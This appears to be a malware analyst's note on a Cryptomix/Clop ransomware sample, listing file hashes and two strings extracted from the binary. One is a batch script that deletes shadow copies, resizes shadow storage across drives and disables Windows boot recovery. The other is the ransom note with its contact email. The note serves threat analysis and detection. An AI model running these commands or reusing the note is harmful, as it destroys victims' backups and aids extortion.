Cryptomix Ransomware Mal Helper
Packed Digital Signed Crypted Bin:
SHA-256: 10f4be34c2e41e6c2d4932ab77f189cf5da659abd028537604eae6435c83516a
Unpacked Ransomware Bin:
SHA-256: 79b8c37a5e2a32e8f7e000822cec6f2f4e317620a2296f1aa3f35b2374c396ec
Reference: https://twitter.com/malwrhunterteam/status/1098578106112245760
bytearray(b'@echo off\r\nvssadmin Delete Shadows /all /quiet\r\nvssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB\r\nvssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded\r\nvssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB\r\nvssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded\r\nvssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB\r\nvssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded\r\nvssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB\r\nvssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded\r\nvssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB\r\nvssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded\r\nvssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB\r\nvssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded\r\nvssadmin Delete Shadows /all /quiet\t\t\r\nbcdedit /set {default} recoveryenabled No\r\nbcdedit /set {default} bootstatuspolicy ignoreallfailures\t ')
bytearray(b'!Your networks has been penetrated!\r\nAll files on each host in the network have been encrypted with a strong algorithm!!!\r\nBackups were either encrypted or deleted or backup disks were formatted!!!\r\nShadow copies also removed, so F8 or any other methods may damage encrypted data but not recover!!!\r\nWe exclusively have decryption software for your situation.\r\nNo DECRYPTION software is AVAILABLE in the PUBLIC.\r\n* DO NOT DELETE readme files.\r\n* DO NOT RENAME OR MOVE the encrypted and readme files.\r\n* DO NOT RESET OR SHUTDOWN \xe2\x80\x93 files may be damaged.\r\n!!!THIS MAY LEAD TO THE IMPOSSIBILITY OF RECOVERY OF THE CERTAIN FILES!!!\r\n!!!ALL REPAIR TOOLS ARE USELESS AND CAN DESTROY YOUR FILES IRREVERSIBLY!!!\r\nIf you want to restore your files write to emails. \r\n[CONTACTS ARE AT THE BOTTOM OF THE SHEET] and attach 2 - 3 encrypted files.\r\n[Less than 6 Mb each, non-archived and your files should not contain valuable information\r\n[Databases, backups, large excel sheets, etc.]]!\r\n!!You will receive decrypted samples and our conditions how to get the decoder!!!\r\n\r\n***ATTENTION***\r\n!!!YOUR WARRANTY - DECRYPTED SAMPLES!!!\r\nDO NOT TRY TO DECRYPT YOUR DATA USING THIRD PARTY SOFTWARE!!!\r\nWE DON`T NEED YOUR FILES AND YOUR INFORMATION!!!\r\n\r\nContacts E-MAIL: \r\nunlock@eqaltech.su \r\n\r\n***THE FINAL PRICE DEPENDS ON HOW FAST YOU WRITE TO US***\r\n===Nothing personal just business=== Clop^_-')